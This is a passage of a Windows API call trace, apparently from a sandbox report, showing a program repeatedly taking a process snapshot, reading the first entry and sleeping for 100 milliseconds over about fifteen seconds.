Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.578] Sleep (dwMilliseconds=0x64) [0174.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0174.667] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.789] Sleep (dwMilliseconds=0x64) [0175.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0175.314] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.459] Sleep (dwMilliseconds=0x64) [0175.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0175.554] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.736] Sleep (dwMilliseconds=0x64) [0175.791] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0175.803] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.077] Sleep (dwMilliseconds=0x64) [0176.144] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0176.163] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.570] Sleep (dwMilliseconds=0x64) [0176.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0176.720] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.127] Sleep (dwMilliseconds=0x64) [0177.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.252] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.399] Sleep (dwMilliseconds=0x64) [0177.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.439] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.546] Sleep (dwMilliseconds=0x64) [0177.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.578] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.651] Sleep (dwMilliseconds=0x64) [0177.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.684] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.772] Sleep (dwMilliseconds=0x64) [0177.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.791] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.868] Sleep (dwMilliseconds=0x64) [0177.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0177.897] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.032] Sleep (dwMilliseconds=0x64) [0178.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.055] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.150] Sleep (dwMilliseconds=0x64) [0178.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.180] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.254] Sleep (dwMilliseconds=0x64) [0178.260] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.273] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.349] Sleep (dwMilliseconds=0x64) [0178.354] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.364] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.436] Sleep (dwMilliseconds=0x64) [0178.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.460] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.531] Sleep (dwMilliseconds=0x64) [0178.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0178.586] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.677] Sleep (dwMilliseconds=0x64) [0179.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0179.692] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.975] Sleep (dwMilliseconds=0x64) [0180.038] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0180.051] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.272] Sleep (dwMilliseconds=0x64) [0180.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0180.335] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.421] Sleep (dwMilliseconds=0x64) [0180.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0180.447] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.556] Sleep (dwMilliseconds=0x64) [0181.127] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0181.140] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.260] Sleep (dwMilliseconds=0x64) [0181.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0181.298] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.399] Sleep (dwMilliseconds=0x64) [0181.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0181.596] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.116] Sleep (dwMilliseconds=0x64) [0182.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0182.197] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.414] Sleep (dwMilliseconds=0x64) [0182.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0182.521] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.207] Sleep (dwMilliseconds=0x64) [0183.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0183.236] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.669] Sleep (dwMilliseconds=0x64) [0183.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0183.725] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.401] Sleep (dwMilliseconds=0x64) [0184.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0184.507] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.707] Sleep (dwMilliseconds=0x64) [0184.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0184.985] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.190] Sleep (dwMilliseconds=0x64) [0185.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0185.227] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.333] Sleep (dwMilliseconds=0x64) [0185.346] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0185.361] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.448] Sleep (dwMilliseconds=0x64) [0185.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0185.501] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.803] Sleep (dwMilliseconds=0x64) [0185.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0185.818] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.898] Sleep (dwMilliseconds=0x64) [0185.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0185.915] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.052] Sleep (dwMilliseconds=0x64) [0186.102] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0186.118] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.227] Sleep (dwMilliseconds=0x64) [0186.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0186.242] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.534] Sleep (dwMilliseconds=0x64) [0186.588] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0186.644] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.732] Sleep (dwMilliseconds=0x64) [0186.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0186.766] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.861] Sleep (dwMilliseconds=0x64) [0186.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0186.882] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.016] Sleep (dwMilliseconds=0x64) [0187.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.037] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.112] Sleep (dwMilliseconds=0x64) [0187.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.130] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.204] Sleep (dwMilliseconds=0x64) [0187.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.233] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.314] Sleep (dwMilliseconds=0x64) [0187.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.368] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.440] Sleep (dwMilliseconds=0x64) [0187.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.462] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.682] Sleep (dwMilliseconds=0x64) [0187.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.712] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.789] Sleep (dwMilliseconds=0x64) [0187.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.803] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.877] Sleep (dwMilliseconds=0x64) [0187.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0187.898] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.982] Sleep (dwMilliseconds=0x64) [0187.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.010] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.094] Sleep (dwMilliseconds=0x64) [0188.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.125] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.206] Sleep (dwMilliseconds=0x64) [0188.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.251] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.330] Sleep (dwMilliseconds=0x64) [0188.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.360] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.441] Sleep (dwMilliseconds=0x64) [0188.448] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.458] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.541] Sleep (dwMilliseconds=0x64) [0188.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.572] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.643] Sleep (dwMilliseconds=0x64) [0188.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.665] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.759] Sleep (dwMilliseconds=0x64) [0188.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.774] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.847] Sleep (dwMilliseconds=0x64) [0188.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.868] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.943] Sleep (dwMilliseconds=0x64) [0188.949] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0188.959] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.073] Sleep (dwMilliseconds=0x64) [0189.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.103] 